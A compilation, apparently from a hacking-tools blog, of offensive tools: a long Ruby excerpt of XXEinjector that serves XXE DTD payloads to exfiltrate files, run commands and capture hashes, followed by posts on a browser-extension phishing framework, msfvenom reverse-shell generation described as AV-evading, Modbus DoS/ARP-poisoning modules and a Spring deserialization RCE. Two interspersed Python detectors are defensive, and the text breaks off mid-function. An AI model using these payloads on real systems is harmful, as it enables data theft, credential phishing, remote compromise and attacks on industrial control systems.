	if enum == "gopher" && $xslt == "n" && enumports == "" && $direct == ""
		gopher = TCPServer.new gopher_port
	end
	if upload != ""
		jar = TCPServer.new jar_port
	end
	if $xslt == "y"
		xsltserv = TCPServer.new xslt_port
	end
rescue Errno::EADDRINUSE
	puts "Specified TCP ports already in use."
	exit(1)
end

# HTTP for XML serving and data retrival
Thread.start do
loop do
  Thread.start(http.accept) do |client|
	$done = 0
	$tmppath = $nextpath
	loop {

		params = {}
		req = client.gets()
		break if req.nil?

		# HTTP XML serving
		if req.include? "file.dtd"

			puts "Got request for XML:\n#{req}\n" if $verbose == "y"

			if hashes == "n" && upload == "" && expect == ""
				if $cut == 1
					puts "Responding with XML for: /#{enumpath}"
				else
					puts "Responding with XML for: #{enumpath}"
				end
			else
				puts "Responding with proper XML."
			end

			# respond with proper XML
			if hashes == "y"
				payload = "<!ENTITY % payl \"hashes\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM '#{$rproto}:////#{host}/hash/hash.txt'>\">"
				client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
			elsif upload != ""
				payload = "<!ENTITY % payl \"upload\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'jar:http://#{host}:#{jar_port}!/upload'>\">"
				client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
			elsif expect != ""
				if enum == "ftp"
					if phpfilter == "n"
						payload = "<!ENTITY % payl SYSTEM \"expect://#{expect}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'ftp://#{host}:#{ftp_port}/%payl;'>\">"
						client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
					else
						payload = "<!ENTITY % payl SYSTEM \"php://filter/read=convert.base64-encode/resource=expect://#{expect}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'ftp://#{host}:#{ftp_port}/%payl;'>\">"
						client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
					end
				elsif enum == "http"
					if phpfilter == "n"
						payload = "<!ENTITY % payl SYSTEM \"expect://#{expect}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://#{host}:#{http_port}/?p=%payl;'>\">"
						client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
					else
						payload = "<!ENTITY % payl SYSTEM \"php://filter/read=convert.base64-encode/resource=expect://#{expect}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://#{host}:#{http_port}/?p=%payl;'>\">"
						client.print("HTTP/1.1 200 OK\r\nContent-Type: application/xml\r\nContent-Length: #{payload.bytesize}\r\nConnection: close\r\n\r\n#{payload}")
					end
				end
			elsif enum == "ftp" && expect == ""
				if phpfilter == "n"
					payload = "<!ENTITY % payl SYSTEM \"#{$rproto}:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'ftp://#{host}:#{ftp_port}/%payl;'>\">"
					client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
				else
					payload = "<!ENTITY % payl SYSTEM \"php://filter/read=convert.base64-encode/resource=file:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'ftp://#{host}:#{ftp_port}/%payl;'>\">"
					client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
				end
			elsif enum == "http" && expect == ""
				if phpfilter == "n"
					payload = "<!ENTITY % payl SYSTEM \"#{$rproto}:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://#{host}:#{http_port}/?p=%payl;'>\">"
					client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
				else
					payload = "<!ENTITY % payl SYSTEM \"php://filter/read=convert.base64-encode/resource=file:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'http://#{host}:#{http_port}/?p=%payl;'>\">"
					client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
				end
			elsif enum == "gopher" && expect == ""
				payload = "<!ENTITY % payl SYSTEM \"#{$rproto}:///#{enumpath}\">\r\n<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM 'gopher://#{host}:#{gopher_port}/?gopher=%payl;'>\">"
				client.print("HTTP/1.1 200 OK\r\nContent-Length: #{payload.length}\r\nConnection: close\r\nContent-Type: application/xml\r\n\r\n#{payload}")
			end
			puts "XML payload sent:\n#{payload}\n\n" if $verbose == "y"

		end

		# HTTP data retrieval
		if req.include? "?p="
			
			switch = 0
			puts "Response with file/directory content received:\n" + req + "\nEnumeration unlocked." if $verbose == "y"
			
			# retrieve p parameter value and respond
			req = req.sub("GET /?p=", "").split(" ")[0]
			client.print("HTTP/1.1 200 OK\r\nContent-Length: 6\r\nConnection: close\r\nContent-Type: text/plain\r\n\r\nThanks")

			# base64 decode if parameter was encoded
			if phpfilter == "y"
				req = Base64.decode64(req)
			end

			# if PHP expect then print and exit
			if expect != ""
				puts "Result of \"#{expect}\" command:\n" + req
				exit(1)
			end

			# set proper splitter
			splitter = "%0A"
			splitter = "\n" if phpfilter == "y"

			req.split(splitter).each do |param|

				param = URI.decode(param)

				# logging to file
				log(param + "\n")

				# push to array if directory listing is detected for further enumeration
				pusharr(param)
			end
		end
		client.close
	}
  end
end
end

# FTP server to read files/directory listings and log to files
if enum == "ftp"
	Thread.start do
	loop do
  	  Thread.start(ftp.accept) do |client|
		$done = 0
		switch = 0
		puts "Response with file/directory content received. Enumeration unlocked." if $verbose == "y"
		$tmppath = $nextpath
		client.puts("220 XXEinjector Welcomes!")
		begin
		status = Timeout::timeout($contimeout) {
			loop {
				req = client.gets()
				break if req.nil?	
	
				# respond with proper option
				if req.include? "LIST"
					client.puts("drwxrwxrwx 1 xxe xxe          1 Jan 01 01:01 xxe")
					client.puts("150 Opening BINARY mode data connection for /xxe")
					client.puts("226 Transfer complete")
				end
				if req.include? "USER"
					client.puts("331 password required")
				end
				if req.include? "PORT"
					client.puts("200 PORT command OK")
				else
					client.puts("230 Now you can send data")
				end
			
				# truncate requests to proper format and base64 decode if encoded
				if req.include? "RETR "
					req = req.split(' ')[1..-1].join(' ')
					req += "\n"
				end
	
				if phpfilter == "y"
					req = Base64.decode64(req)
				end
	
				# if PHP expect then print and exit
				if expect != ""
					puts "Result of \"#{expect}\" command:\n" + req
					exit(1)
				end
				
				# logging to file
				log(req)	
	
				# clear requests that are known to be not part of directory listing
				req = req.chomp
				if req.include?("CWD ") || req.match(/^USER /) || req.match(/^PASS /) || req == "TYPE I" || req.include?("EPSV") || req == "TYPE A" || req == "LIST"
					req = ""
				end
	
				# push to array if directory listing is detected for further enumeration
				pusharr(req)
	
			}
		}
		rescue Timeout::Error
		end
		client.close
  	  end
	end
	end
end

# gopher server to read files/directory listings and log to files
if enum == "gopher"
	Thread.start do
	loop do
 	  Thread.start(gopher.accept) do |client|
		$done = 0
		switch = 0
		puts "Response with file/directory content received. Enumeration unlocked." if $verbose == "y"
		$tmppath = $nextpath
		begin
		status = Timeout::timeout($contimeout) {
			loop {
				req = ""
				loop do
					tmp = client.gets()
					break if tmp.chomp == ""
					req += tmp
				end
	
				req.sub! 'gopher=', ''
				req.split("\n").each do |param|
	
					# logging to file
					log(param + "\n")
			
					# push to array if directory listing is detected for further enumeration
					pusharr(param)
				end
	
			}
		}
		rescue Timeout::Error
		end
		client.close
  	  end
	end
	end
end

# logger
if $logger == "y"
	puts "You can now make requests."
	puts "Enter \"exit\" to quit."
	loop do
		cmp = Readline.readline("> ", true)
		exit(1) if cmp.chomp == "exit"
	end
end

# unfiltered ports enumeration
if enumports != ""
	ports = ""

	# enumerating all ports
	if enumports == "all"
		j = 1
		while j <= 65535  do
			$dtd = "<!DOCTYPE convert [ <!ENTITY % remote SYSTEM \"http://#{host}:#{j}/success.dtd\">%remote;]>"
			begin
				Thread.start do
				loop do
				  enum = TCPServer.new j
  				  Thread.start(enum.accept) do |client|
					ports += String(j) + ","
					client.close
					break
				  end
				end
				end
				configreq()
				sendreq()
				send2ndreq() if $secfile != ""
				j = j + 1
			rescue Errno::EADDRINUSE
				puts "Cannot bind to #{j} port."
			end
		end

	# enumerating only specified ports
	else
		tports = enumports.split(",")
		tports.each do |tcpport|
			$dtd = "<!DOCTYPE convert [ <!ENTITY % remote SYSTEM \"http://#{host}:#{tcpport}/success.dtd\">%remote;]>"
			begin
				Thread.start do
				loop do
				  enum = TCPServer.new tcpport
  				  Thread.start(enum.accept) do |client|
					ports += String(tcpport) + ","
					client.close
					break
				  end
				end
				end
				configreq()
				sendreq()
				send2ndreq() if $secfile != ""
			rescue Errno::EADDRINUSE
				puts "Cannot bind to #{tcpport} port."
			end
		end
	end
	if ports != ""
		puts "Unfiltered ports: " + ports[0..-2]
	else
		puts "No unfiltered ports were identified."
	end
	exit(1)
else
	if $direct == ""
		configreq()
	end
end

# TCP server for uploading files using Java jar
if upload != ""
	Thread.start do
	loop do
  	  Thread.start(jar.accept) do |client|
		content = IO.binread(upload)
		count = 0
		puts "File uploaded. Check temp directory on remote host for jar_cache*.tmp file. This file is available until connection is closed."
		loop do
			if count == 0
				client.puts(content)
				count = 1
			end
			sleep(10000)
		end
	  end		
	end
	end
	sendreq()
	loop do
		sleep(10000)
	end
end

# TCP server for XSLT injection test
if $xslt == "y"
	test = 0
	Thread.start do
	loop do
  	  Thread.start(xsltserv.accept) do |client|
		puts "XSLT injection is working!"
		client.close
		exit(1)
	  end		
	end
	end
	sendreq()
	send2ndreq() if $secfile != ""
	sleep timeout
	puts "XSLT is not working."
	exit(1)
end

# Retrieving Windows hashes
if hashes == "y"
	puts "Start msfconsole with auxiliary/server/capture/smb. Press enter when started."
	Readline.readline("> ", true)
	sendreq()
	send2ndreq() if $secfile != ""
	sleep(10)
	puts "Check msfconsole for hashes."
	Readline.readline("> ", true)
	exit(1)
end

# Sending first request
if $brute == ""
	if $direct == ""
		enumpath = $path
		switch = 1
		puts "Enumeration locked." if $verbose == "y"
		sendreq()
		send2ndreq() if $secfile != ""
	else
		$done = 0
		$directpath = $path
		configreq()
		sendreq()
		send2ndreq() if $secfile != ""
		if !$response.body.include?("#{$direct}")
			puts "Response does not contain unique mark."
			exit(1)
		else
			if $response.body.include?("#{$direct}#{$direct}")
				puts "File/directory could not be retrieved."
				exit(1)
			else
				$response.body[/(#{$direct})(.*)(#{$direct})/m].gsub("#{$direct}", "\n").split("\n").each do |param|				
					
					# log to separate file
					log(param + "\n")
					
					# push to array if directory listing is detected for further enumeration
					param = param.chomp
					if param.match $regex
						$filenames.push(param)
						puts "Path pushed to array: #{param}" if $verbose == "y"
					end

				end
			end
		end
	end

	# Loop that checks if response with next file content was received by FTP/HTTP server
	if $direct == ""
		loop do
			sleep timeout
			if switch == 1 && hashes == "n" && upload == ""
				puts "FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive. Wait or Next? W/n"
				cmp = Readline.readline("> ", true)
				Readline::HISTORY.push
				break if cmp == "n" || cmp == "N"
				sleep timeout
			else
				break
			end
		end
	end
end

# read, ask and further enumerate
loop do
	if $brute == ""
		if !$filenames[i].nil?
		
			# Read next line
			line = $filenames[i]
			line = line.chomp
			line = line.gsub(' ','%20')
		
			# Check if a file should be enumerated
			check = "#{$path}/#{line}".split("/")[0..-2].join('/')

			if enumall != "y" && !blacklist.include?(check) && !whitelist.include?(check)
				if $cut == 0
					if $path[-1] == "/"
						puts "Enumerate #{$path}#{line} ? Y[yes]/n[no]/s[skip all files in this directory]/a[enum all files in this directory]"
					else
						puts "Enumerate #{$path}/#{line} ? Y[yes]/n[no]/s[skip all files in this directory]/a[enum all files in this directory]"
					end
				else
					if $path == ""
						puts "Enumerate /#{line} ? Y[yes]/n[no]/s[skip all files in this directory]/a[enum all files in this directory]"
					else
						puts "Enumerate /#{$path}/#{line} ? Y[yes]/n[no]/s[skip all files in this directory]/a[enum all files in this directory]"
					end
				end
				cmp = Readline.readline("> ", true)
				Readline::HISTORY.push
				if cmp == "s" || cmp == "S"
					blacklist.push("#{$path}/#{line}".split("/")[0..-2].join('/'))
				end
				if cmp == "a" || cmp == "A"
					whitelist.push("#{$path}/#{line}".split("/")[0..-2].join('/'))
					cmp = "y"
				end
			elsif	enumall == "y" || whitelist.include?(check)
				cmp = "y"
			else 
				cmp = "n"
			end
			if cmp == "y" || cmp == "Y" || cmp == ""
				if enumall != "y" && !whitelist.include?(check)
					switch = 1
					puts "Enumeration locked." if $verbose == "y"
				end
				$nextpath = "#{line}"
	
				# Send request with next filename
				if $direct != ""
					if $path[-1] != "/"
						$directpath = "#{$path}/#{line}"
					else
						$directpath = "#{$path}#{line}"
					end
					configreq()
				else
					if $path[-1] != "/"
						enumpath = "#{$path}/#{line}"
					else
						enumpath = "#{$path}#{line}"
					end
				end
				enumpath[0] = "" if enumpath[0] == "/"
				sendreq()
				send2ndreq() if $secfile != ""

				# Loop that checks if response with next file content was received by FTP/HTTP servers
				if $direct == ""
					loop do
						sleep timeout
						if switch == 1
							puts "FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive. Wait or Next? W/n"
							cmp = Readline.readline("> ", true)
							Readline::HISTORY.push
							break if cmp == "n" || cmp == "N"
							sleep timeout
						else
							break
						end
					end
				else
					if not $response.body.include?("#{$direct}")
						puts "Response does not contain unique mark."
					else
						if $response.body.include?("#{$direct}#{$direct}")
							puts "File/directory could not be retrieved."
						else
							$done = 0
							$response.body[/(#{$direct})(.*)(#{$direct})/m].gsub("#{$direct}", "\n").split("\n").each do |param|				

								# log to separate file
								log(param + "\n")
					
								# push to array if directory listing is detected for further enumeration
								pusharr(param)

							end
						end
					end
				end

			end
			i = i + 1
		else
			puts "Nothing else to do. Exiting."
			exit(1)
		end
	else
		brutefile = File.open($brute, "r")
		exit(1) if IO.readlines(brutefile)[i].nil?
		
		# Read next line
		line = IO.readlines(brutefile)[i]
		line = line.chomp

		log = File.open($output, "a")
		log.write "\n"
		log.write "Filename: #{line}\n"
		log.close

		# handle unix and windows paths
		if line[0] == "/"
			line[0] = ''
			$cut = 1
		end
		line = line.gsub("\\","/")
		if line[-1] == "/" && line[-2] != ":"
			line[-1] = ''
		end
		if line[-1] == ":"
			line += '/'
		end

		line = line.gsub(' ','%20')

		# Send request with next filename
		if $direct == ""
			enumpath = "#{line}"
		else
			$directpath = "#{line}"
			configreq()
		end
		sendreq()
		send2ndreq() if $secfile != ""

		if $direct != ""
			if not $response.body.include?("#{$direct}")
				puts "Response does not contain unique mark." if $verbose == "y"
			else
				log = File.open($output, "a")
				log.write $response.body[/(#{$direct})(.*)(#{$direct})/m].gsub("#{$direct}", "\n") + "\n"
				puts "Bruteforced request logged: #{$directpath}" if $verbose == "y"
				log.close
			end
		end

		i = i + 1
		
		brutefile.close
		sleep timeout
	end
end

Source: https://github.com/enjoiz | Our post before

LynxFramework is a browser-extension exploitation framework.


LynxFramework is a browser exploitation tool built around browser extensions, currently for Google Chrome, with Firefox support to follow. It works by injecting a script into the browser in order to retrieve the targeted data.

LynxFramework has been tested on Windows, Mac OS X, Ubuntu, and Kali 2.0.

ONLINE PAYLOAD:
+ XSSKeylogger: XSS keylogger
+ ForceDownload: forces a file download
+ paytoweb: www.paytoweb.com
+ Paypal: https://www.paypal.com/signin/
+ Facebook: http://facebook.com

usage:

git clone https://github.com/graniet/LynxFramework && cd LynxFramework
python LynxFramework.py
set:payload (what do you want)
then open your chrome browser..

Source: https://github.com/graniet | https://lynxframework.com/

venom.sh Codename: comodo venom 1.0.9 released.


Changelog v1.0.9 Comodo Venom 20/1/2016:
+ venom.sh
+ template: remove templates/easy_ps1.bat, remove templates/easy_ps1.bat
+ display shellcode:

venom-sh-1-0-9

The script uses msfvenom (Metasploit) to generate shellcode in different formats (c | python | ruby | dll | msi | hta-psh), injects the generated shellcode into a function (for example a Python function that executes the shellcode in RAM), uses compilers such as gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file, and also starts a multi-handler to receive the remote connection (reverse shell or Meterpreter session).

The 'shellcode generator' tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, PowerSploit, etc. "P.S. some payloads are undetectable by AV solutions, yes!!!" One of the reasons for that is the use of a function to execute the 2nd stage of shell/meterpreter directly in the target's RAM.

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

payload-multi-handler

Features
option – build – target – format – output

1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – C – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – C – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – windows – PSH-CMD – PS1
10 – shellcode – windows – PSH-CMD – BAT
11 – shellcode – webserver – PHP – PHP
12 – shellcode – multi OS – PYTHON(b64) – PYTHON

F – FAQ (frequently asked questions)
E – exit shellcode generator

Usage:

Download shell.tar.gz
tar xf shell.tar.gz
./venom.sh 

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

Updates:
cd crisp-shellcode-generator-shell
git pull

[ HOW DOES MSFVENOM ACTUALLY BUILD SHELLCODE? ]
The default way to generate a Windows binary payload (.exe) using msfvenom is through the -f flag (output format):
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allows us to build shellcode in different formats,
such as: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh,
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c,
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the following command: sudo msfvenom --help-formats

Now let's generate simple shellcode for windows/shell/reverse_tcp,
choosing powershell as the output format. Note that we will not use
the -o (save the payload) option, so the generated shellcode is
only displayed in the current terminal window.
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

our post before | Download: shell.tar.gz (24 MB)
Source: http://sourceforge.net/p/crisp-shellcode-generator/

searchsploit – exploit database in windows version.


This is a spin-off of the Exploit Database searchsploit tool, written in C# for Windows environments.

searchsploit

Requirements:
.NET 4.5.2. An update is required at first use to download the necessary packages: searchsploit -u or searchsploit --update
CLI menu:

searchsploit -h
  Usage: searchsploit [OPTIONS] term1 [term2] ... [termN]
Example:
  searchsploit afd windows local
  searchsploit -t oracle windows
  searchsploit --nmap NmapScan.xml

=========
 Options
=========
   -c, --case     Perform a case-sensitive search (Default is insensitive).
   -h, --help     Show this help screen.
   -t, --title    Search just the exploit title (Default is title AND the file's path).
   -u, --update   Update exploit database from git.
   -v, --verbose  Verbose output. Title lines are allowed to overflow their columns.
   -w, --www      Show URLs to Exploit-DB.com rather than local path.
       --colour   Disable colour highlighting.
       --id       Display EDB-ID value rather than local path.
       --nmap     Reads nmap's exported xml file to return vulnerabilities per host.

=======
 Notes
=======
 * Use any number of search terms, in any order.
 * Search terms are not case sensitive, and order is irrelevant.
   * Use '-c' if you wish to reduce results by case-sensitive searching.
* Use '-t' to exclude the file's path to filter the search results.
   * Could possibly remove false positives (especially when searching numbers).
 * When updating from git or displaying help, search terms will be ignored.

Usage:
Download the *.zip and unzip it.
Right-click and open it in Visual Studio Community,
then build searchsploit.

Download : exploit-database-c-sharp.zip
Source : https://github.com/raul5660


smod v1.0.1 – MODBUS Penetration Testing Framework


Changelog v1.0.1:
+ New modules:
  modbus/dos/galil                       RIO DOS Galil RIO-47100
  modbus/dos/writeSingleCoils            DOS with Write Single Coil function
  modbus/dos/writeSingleRegister         DOS with Write Single Register function
  modbus/function/readExceptionStatus    Fuzzing Read Exception Status function
  modbus/sniff/arp                       ARP poisoning

smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest the Modbus protocol. It is a full Modbus protocol implementation using Python and Scapy, and runs on Linux/OSX under Python 2.7.x.

smod-v1-0-1

Summary
SCADA (process control network) systems have steadily moved from proprietary closed networks to open-source solutions and TCP/IP-enabled networks over recent years. This has made them vulnerable to the same security vulnerabilities that face our traditional computer networks.
The Modbus/TCP protocol was used as the reference protocol to display the effectiveness of the test bed in carrying out cyber attacks on a power system protocol. Modbus/TCP was chosen specifically for these reasons:
+ Modbus is still widely used in power systems.
+ Modbus/TCP is simple and easy to implement.
+ Modbus protocol libraries are freely available for utilities to implement smart grid applications.
You can use this tool to run a vulnerability assessment of a Modbus implementation.
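The write and exception-status functions that the dos/* and function/* modules above exercise are also what a network monitor can look for. As an added example (not part of smod), the following Python parses Modbus/TCP frames and alerts on writes from hosts outside an assumed engineering allowlist, on repeated Write Single Coil/Register requests to one address, and on Read Exception Status requests carrying trailing bytes; the sample packets and the 10.0.0.x addresses are constructed.

```python
import struct
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, List, Set, Tuple

MBAP_LEN = 7     # transaction id (2) + protocol id (2) + length (2) + unit id (1)
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers"}
READ_EXCEPTION_STATUS = 7


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int
    data: bytes


def build_frame(tid: int, unit_id: int, fc: int, data: bytes) -> bytes:
    """Encode one request; used here only to construct the sample traffic."""
    return struct.pack(">HHHB", tid, 0, 2 + len(data), unit_id) + bytes([fc]) + data


def parse_frames(payload: bytes) -> List[ModbusFrame]:
    """Split a TCP payload into Modbus/TCP frames; the MBAP length field counts
    the unit id byte plus the PDU, so several requests may share one segment."""
    frames: List[ModbusFrame] = []
    offset = 0
    while offset < len(payload):
        if len(payload) - offset < MBAP_LEN + 1:
            raise ValueError(f"truncated MBAP header at offset {offset}")
        tid, pid, length, unit_id = struct.unpack(">HHHB", payload[offset:offset + MBAP_LEN])
        if pid != 0:
            raise ValueError(f"protocol id {pid} is not Modbus")
        end = offset + 6 + length
        if length < 2 or end > len(payload):
            raise ValueError(f"bad MBAP length {length} at offset {offset}")
        fc = payload[offset + MBAP_LEN]
        frames.append(ModbusFrame(tid, unit_id, fc, payload[offset + MBAP_LEN + 1:end]))
        offset = end
    return frames


def audit(packets: Iterable[Tuple[str, bytes]], engineering_hosts: Set[str],
          flood_threshold: int = 5) -> List[str]:
    """packets are (source ip, TCP payload) pairs in arrival order; returns one
    alert per finding. Assumes only engineering_hosts may issue writes."""
    alerts: List[str] = []
    flagged: Set[Tuple[str, int]] = set()      # (src, fc) already reported
    writes: Counter = Counter()                # (src, fc, address) -> count
    for src, payload in packets:
        for fr in parse_frames(payload):
            fc = fr.function_code
            if fc in WRITE_FUNCTIONS:
                name = WRITE_FUNCTIONS[fc]
                address = struct.unpack(">H", fr.data[:2])[0] if len(fr.data) >= 2 else -1
                if src not in engineering_hosts and (src, fc) not in flagged:
                    flagged.add((src, fc))
                    alerts.append(f"{src}: {name} to unit {fr.unit_id} address {address} "
                                  "from a host not allowed to write")
                writes[(src, fc, address)] += 1
                if writes[(src, fc, address)] == flood_threshold:
                    alerts.append(f"{src}: {name} repeated {flood_threshold}x on address "
                                  f"{address} (write flood, DoS pattern)")
            elif fc == READ_EXCEPTION_STATUS and fr.data:
                # A well-formed Read Exception Status request carries nothing after
                # the function code; trailing bytes are what a fuzzer produces.
                alerts.append(f"{src}: Read Exception Status with {len(fr.data)} "
                              "unexpected data bytes (fuzzing pattern)")
    return alerts


# Constructed sample traffic (not a capture): an HMI reading and writing normally,
# then a rogue host hammering one coil and fuzzing function code 7.
ENGINEERING_HOSTS = {"10.0.0.5"}
SAMPLE_PACKETS: List[Tuple[str, bytes]] = [
    ("10.0.0.5", build_frame(1, 1, 3, struct.pack(">HH", 0, 10))),     # read 10 holding registers
    ("10.0.0.5", build_frame(2, 1, 6, struct.pack(">HH", 40, 1234))),  # write one setpoint
    ("10.0.0.5", build_frame(3, 1, 1, struct.pack(">HH", 0, 8))        # two requests coalesced
     + build_frame(4, 1, 2, struct.pack(">HH", 0, 8))),                # into one TCP segment
]
SAMPLE_PACKETS += [("10.0.0.99", build_frame(10 + i, 1, 5, struct.pack(">HH", 1, 0xFF00)))
                   for i in range(5)]
SAMPLE_PACKETS.append(("10.0.0.99", build_frame(20, 1, 7, b"\x00" * 6)))

if __name__ == "__main__":
    for line in audit(SAMPLE_PACKETS, ENGINEERING_HOSTS):
        print(line)
```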

Installation & usage:

git clone https://github.com/enddo/smod && cd smod
python smod.py

Update:
cd smod
git pull

Source : https://github.com/enddo | Our Post Before

Proof of concept exploit, showing how to do bytecode injection through untrusted deserialization.


The Spring framework is a commonly used third-party library found in many Java server projects. If spring-tx.jar, spring-commons.jar and javax.transaction-api.jar are on your classpath, and you use RMI, JMS, IIOP or any other form of untrusted Java deserialization, you are vulnerable to this RCE exploit.
Spring maintainer Pivotal rejected my report on this issue, arguing that the problem lies in the untrusted deserialization, so this issue remains unpatched.

JtaTransactionManager
+ spring-tx.jar contains a class named org.springframework.transaction.jta.JtaTransactionManager which is vulnerable to the JNDI deserialization issue described in my last post.
+ The readObject() method ends up in a chain looking like the following: initUserTransactionAndTransactionManager()->initUserTransactionAndTransactionManager()->JndiTemplate.lookup()->InitialContext.lookup(), where the argument to the InitialContext.lookup() call is userTransactionName, which we are able to control.
+ All we have to do is create a JtaTransactionManager object, set userTransactionName to an RMI string pointing back to our own RMI registry, and send the object to a vulnerable server. The RMI string would look something like "rmi://x.x.x.x:1099/Object".
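Because the dangerous call happens inside readObject(), a server that must accept serialized objects has to decide before deserialization whether the stream declares a gadget class. As an added example (not from the PoC or from Spring), the following Python walks a Java serialization stream, extracts the class names it declares and its string constants, and reports the JtaTransactionManager class and JNDI-style URLs such as the rmi:// string above; the sample streams are hand-built, and the scanner is a heuristic that does not follow TC_REFERENCE back-references, so it complements rather than replaces a reject-by-default deserialization filter in the JVM.

```python
import re
import struct
from typing import Dict, List, Tuple

STREAM_MAGIC = b"\xac\xed\x00\x05"          # STREAM_MAGIC + STREAM_VERSION 5
TC_OBJECT, TC_CLASSDESC, TC_STRING = 0x73, 0x72, 0x74
TC_ENDBLOCKDATA, TC_NULL = 0x78, 0x70
# Assumed denylist holding only the class the post names; a real filter would
# carry the full gadget list for the stack in use, or better, an allowlist.
GADGET_CLASSES = {"org.springframework.transaction.jta.JtaTransactionManager"}
JNDI_SCHEMES = ("rmi:", "ldap:", "ldaps:", "iiop:", "corbaname:")
CLASS_NAME_RE = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$")


def _utf(blob: bytes, pos: int):
    # 2-byte length-prefixed string at pos; None if it does not fit or is not printable ASCII
    if pos + 2 > len(blob):
        return None
    n = struct.unpack(">H", blob[pos:pos + 2])[0]
    body = blob[pos + 2:pos + 2 + n]
    if len(body) != n or not body or not all(32 <= b < 127 for b in body):
        return None
    return body.decode("ascii")


def _skip_fields(blob: bytes, pos: int) -> int:
    # Step over serialVersionUID (8), flags (1) and the field table so field names
    # are not mistaken for tags; on any parse failure return pos unchanged.
    start = pos
    if pos + 11 > len(blob):
        return start
    count = struct.unpack(">H", blob[pos + 9:pos + 11])[0]
    pos += 11
    for _ in range(count):
        if pos >= len(blob):
            return start
        typecode, name = chr(blob[pos]), _utf(blob, pos + 1)
        if name is None:
            return start
        pos += 3 + len(name)
        if typecode in "L[":                    # object/array fields carry a signature
            if pos >= len(blob) or blob[pos] != TC_STRING:
                return start                    # TC_REFERENCE back-ref: resume byte-wise scan
            sig = _utf(blob, pos + 1)
            if sig is None:
                return start
            pos += 3 + len(sig)
    return pos


def scan_stream(blob: bytes) -> Dict[str, List[str]]:
    """Collect the class names a stream declares and its string constants."""
    if not blob.startswith(STREAM_MAGIC):
        raise ValueError("not a Java serialization stream")
    classes, strings = [], []
    i = len(STREAM_MAGIC)
    while i < len(blob):
        tag = blob[i]
        if tag == TC_CLASSDESC:
            name = _utf(blob, i + 1)
            if name is not None and CLASS_NAME_RE.match(name):
                classes.append(name)
                i = _skip_fields(blob, i + 3 + len(name))
                continue
        elif tag == TC_STRING:
            text = _utf(blob, i + 1)
            if text is not None:
                strings.append(text)
                i += 3 + len(text)
                continue
        i += 1
    return {"classes": classes, "strings": strings}


def findings(blob: bytes) -> List[str]:
    """Reasons to reject the stream; an empty list means nothing was flagged."""
    seen = scan_stream(blob)
    out = [f"gadget class declared: {c}" for c in seen["classes"] if c in GADGET_CLASSES]
    out += [f"JNDI-style URL in stream: {s}" for s in seen["strings"]
            if s.lower().startswith(JNDI_SCHEMES)]
    return out


def _classdesc(name: str, fields: List[Tuple[str, str, str]]) -> bytes:
    # Encode a TC_CLASSDESC (SC_SERIALIZABLE, no superclass); only for the samples below
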